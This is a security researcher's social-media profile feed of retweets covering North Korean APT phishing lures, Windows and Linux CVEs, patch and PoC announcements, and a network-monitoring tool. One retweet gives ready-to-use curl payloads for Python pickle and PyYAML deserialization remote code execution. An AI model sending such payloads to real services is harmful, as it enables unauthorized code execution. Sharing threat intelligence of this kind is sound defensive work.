CPO(Chief Product Officer) at 78ResearchLab. Former principal researcher of KrCERT/CC. DFIR, Research on hacking technique, Profiling hacking source.

Joined September 2010
72 Photos and videos
Moonbeom(Daniel) retweeted
#NorthKorea #APT37 #NarwhalRAT Analysis of APT37 NarwhalRAT Leveraging MS-Themed Phishing and Dead-drop C2 genians.co.kr/en/blog/threat…
7
20
572
Moonbeom(Daniel) retweeted
Ordinary citizens criticized the election commission for its poor management and demanded reform. The government is listening to them, so now only the election fraud conspiracy theorists remain. Some far‑right Protestants hold worship services at the protest site. That's why more than 70% of Koreans without religion cannot sympathize with them.
Jun 12
How South Korea's ballot shortage spurred turnout of thousands to defend democracy reut.rs/3S1Ckz3
1
23
52
3,731
Moonbeom(Daniel) retweeted
Jun 12
Broken official patches for Windows Shell Spoofing Vulnerability (CVE-2026-32202) 0patch.com/blog/micropatches…
1
7
19
1,481
Moonbeom(Daniel) retweeted
We released a demo video for the CVE-2026-45458 Microsoft Outlook and Word Remote Code Execution Vulnerability, patched by Microsoft in Jun 2026. Watch the video and subscribe to our private vulnerability PoC and detailed report service at Patchpoint.io. You can also check it at the following link: youtu.be/AgKhh3bvD8Y #Windows #Microsoft #Word #Outlook #Critical #Vulnerability #CVE_2026_45458
2
6
475
Moonbeom(Daniel) retweeted
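Finally found an open-source gem that can replace Wireshark. Sniffnet, with 37,000 stars on GitHub, turns network monitoring into something ordinary people can understand. Many people's first reaction on opening Wireshark is: can't understand it, close it right away. Sniffnet is completely different. It shows upload and download traffic, connected hosts, visited domains and IP geolocation in real time, and can even show software that is quietly connecting to the network. It supports traffic filtering, PCAP import and export, and monitoring of multiple network adapters. Most importantly, the interface is very comfortable. No need to study packet-capture rules or learn complex commands; open it and you can see who your computer is actually talking to. Many users simply treat it as a free alternative to GlassWire. (Windows Central) It supports Windows, macOS and Linux, is written in Rust, and uses very few resources. (GitHub) For people who often tinker with proxies, NAS, Docker and servers, this is definitely a must-install tool. github.com/GyulyVGC/sniffnet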
122
893
5,622
364,104
Moonbeom(Daniel) retweeted
78ResearchLab is excited to announce its membership in the NVIDIA Inception program!
3
6
251
Moonbeom(Daniel) retweeted
DPRK Shenanigans "Hangul doc" .lnk hides 313 spaces of padding so the real cmd is invisible. Runs PS-> opens a 🇰🇷 Ministry of Unification decoy while installing a hidden scheduled task. #DPRK #Kimsuky #APT43 e291ee630a58c405f86ca83d9364bfc3dbf13aecff9000cca4f2602158dac845
1
16
39
4,047
Moonbeom(Daniel) retweeted
Python RCE Pickle curl TARGET/api -H"Content-Type:application/json" -d'{"data":"gASVKwAAAAAAAACMCnN1YnByb2Nlc3OUjAxjaGVja19vdXRwdXSUk5RdlIwCaWSUYYWUUpQu"}' PyYAML curl TARGET/api/config -H"Content-Type:application/x-yaml" -d'!!python/object/new:subprocess.check_output [["id"]]'
4
49
336
24,292
Moonbeom(Daniel) retweeted
May 26
Micropatches released for Windows Netlogon Remote Code Execution Vulnerability (CVE-2026-41089) blog.0patch.com/2026/05/micr…
2
34
117
10,258
Moonbeom(Daniel) retweeted
2603vvip고객현황.lnk 7f9fe5839a2ffaa627685f673ee5d4ba5a30857c24d4cf141ab408c7a18e3f4a *TaskName : Intel(R) Ethernet2 Connection 1209-LG #APT #Suspicious
1
10
12
3,253
Moonbeom(Daniel) retweeted
Windows DNS Client RCE -- CVE-2026-41096 POC -- qdcount=0, a DNS OPT resource record (type 41), and 0xff bytes via example response -- github.com/satchfunky/CVE-20…
2
69
249
22,902
Moonbeom(Daniel) retweeted
Cyber Threat Overview 2025 From cert-FR github.com/blackorbird/APT_R…
15
55
4,608
Moonbeom(Daniel) retweeted
‼️🚨 Microsoft has patched a critical Windows DNS Client remote code execution vulnerability that allows an unauthorized attacker to execute code over a network. All it takes is a malicious DNS response.
The vulnerability is tracked as CVE-2026-41096 with a CVSS score of 9.8. It is a heap-based buffer overflow in dnsapi.dll, the Windows component that processes DNS answers on every machine.
To trigger it, an attacker needs a position where they can influence DNS responses: a rogue DNS server, a poisoned resolver, a compromised router, hostile WiFi, or a man-in-the-middle placement.
That puts ordinary Windows DNS activity in the blast radius. Browsers, VPN clients, enterprise apps, update checks, and background services constantly ask DNS where to connect. The vulnerable processing sits in the Windows DNS Client path, not an edge-facing server product.
Microsoft assessed exploitation as "less likely," and Rapid7 lists the issue as not publicly disclosed and not known to be exploited at release. On the contrary, a 9.8 unauthenticated network RCE in DNS client handling is exactly the kind of bug defenders should assume will be reverse-engineered quickly.
Defenders should:
- Deploy the May 2026 cumulative updates and confirm coverage across endpoints and servers
- Restrict DNS traffic to trusted resolvers where possible
- Monitor Dnscache and svchost.exe for abnormal child processes or unexpected outbound activity
- Treat public WiFi and untrusted resolver paths as higher-risk until patching is complete
35
312
1,553
133,953
Moonbeom(Daniel) retweeted
Urgent: Public PoC for Apache HTTP Server. A critical double-free enables unauthenticated DoS and RCE. Update to Apache 2.4.67 immediately. #Apache #CyberSecurity #InfoSec #RCE #VulnerabilityAlert #CVE #WebSecurity #PoC #SysAdmin securityonline.info/apache-h…
13
56
4,142
Moonbeom(Daniel) retweeted
May 13
another day, another universal linux LPE
May 9
0e78b6737119a3141e466464ee2748eb84a61750958d0cb5824febbdadd875be poc.c
40
344
2,550
535,923
Moonbeom(Daniel) retweeted
260506_한국 핵추진잠수함 협력 전략과 로드맵.pdf.lnk 4453b9e985f452365995c399f5292c92764570f03e6a066d7845320dd4ad09a1 #APT
2
5
934
Moonbeom(Daniel) retweeted
We're likely 1st to publicly exploit crypto: af_alg as a new attack surface in kernelCTF. Our members @n0psledbyte & @st424204 started poking it in Sep 2025, finding a 0-day container escape unnoticed since 2011. @AnthropicAI @OpenAI: interested in collaborations? We are all ears
2
51
345
59,090